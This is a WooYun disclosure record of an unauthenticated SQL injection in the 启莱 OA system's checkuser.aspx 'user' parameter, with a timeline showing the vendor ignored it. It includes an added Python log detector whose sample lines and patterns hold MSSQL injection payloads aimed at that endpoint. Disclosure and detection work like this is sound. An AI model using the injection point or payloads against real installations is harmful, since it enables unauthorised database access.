
Vulnerability summary

Defect ID: wooyun-2015-0150069

Title: 启莱 OA system unauthenticated SQL injection (with many affected cases)

Affected vendor: qioa.cn

Author: 路人甲

Submitted: 2015-10-29 12:25

Fix deadline: 2016-02-01 12:30

Public disclosure: 2016-02-01 12:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-29: details sent to the vendor, awaiting vendor handling
2015-11-03: vendor actively ignored the vulnerability; details opened to third-party security partners (绿盟科技 NSFOCUS 唐朝安全巡航)
2015-12-28: details disclosed to core white hats and relevant domain experts
2016-01-07: details disclosed to regular white hats
2016-01-17: details disclosed to intern white hats
2016-02-01: details disclosed to the public

Brief description:

No login required.

Detailed description:

启莱科技 OA system:
http://www.qioa.cn/product/xsd.html
Customer cases:
Many government and enterprise customers are affected, though the vendor's case list is not very easy to read:
http://www.qioa.cn/index.php?m=content&c=index&a=lists&catid=7
Injection point:

/client/checkuser.aspx?user=1&pwd=1   (the user parameter is injectable)
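As an added example (not part of the report or of the vendor's software), the Python below flags requests that carry the report's injection shapes against /client/checkuser.aspx in constructed web-server log lines; the IIS-style field layout, the indicator weights and the 5xx bonus are assumptions chosen for this illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed IIS-style log lines (fields assumed: date time method uri-stem
# uri-query status). The payload shapes mirror those quoted in the report.
SAMPLE_LOG = """\
2015-10-29 04:01:12 GET /client/checkuser.aspx user=alice&pwd=s3cret 200
2015-10-29 04:01:30 GET /client/checkuser.aspx user=%27and%20@@version%3E0--&pwd=1 500
2015-10-29 04:02:02 GET /client/checkuser.aspx user=1%27&pwd=1 500
2015-10-29 04:02:40 GET /client/checkuser.aspx user=1%27/**/aND-/**/1=char(@@version)/**/%20--%20&pwd=1 200
2015-10-29 04:03:15 GET /index.aspx page=1 200
2015-10-29 04:03:50 GET /client/checkuser.aspx user=o%27brien&pwd=x 200
"""

# Indicators taken from the report's payloads, weighted so that a lone
# apostrophe in a legitimate name (o'brien) stays below the alert threshold.
INDICATORS = [
    (re.compile(r"'"), 1, "quote"),
    (re.compile(r"--"), 2, "line-comment"),
    (re.compile(r"/\*.*?\*/"), 2, "inline-comment"),
    (re.compile(r"@@version", re.IGNORECASE), 3, "mssql-version"),
    (re.compile(r"\b(and|or)\b", re.IGNORECASE), 1, "boolean-op"),
]

def score_user_param(query):
    """Score the decoded user parameter; returns (score, matched indicator names)."""
    user = parse_qs(query, keep_blank_values=True).get("user", [""])[0]
    decoded = unquote_plus(user)  # second pass catches double-encoded payloads
    score, names = 0, []
    for pattern, weight, name in INDICATORS:
        if pattern.search(decoded):
            score += weight
            names.append(name)
    return score, names

def find_injection_attempts(log_text, threshold=3):
    """Return (line_no, score, names) for checkuser.aspx hits at or above threshold."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if len(parts) < 6 or not parts[3].lower().endswith("/client/checkuser.aspx"):
            continue
        score, names = score_user_param(parts[4])
        if parts[5].startswith("5"):  # a quote that breaks the query usually yields a 5xx
            score += 2
            names.append("server-error")
        if score >= threshold:
            hits.append((line_no, score, names))
    return hits
```

Tune the weights and threshold against your own traffic before alerting; the 5xx corroboration is what lifts a bare single-quote probe above a legitimate apostrophe in a username.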


Cases (65 affected installations, hosts masked):


Proof of vulnerability:

Case test: (screenshot 1.jpg)

SQLMAP test: (screenshots 2.jpg, 3.jpg)

Fix recommendation:

Copyright notice: when reposting, please credit 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-02-01 12:30

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None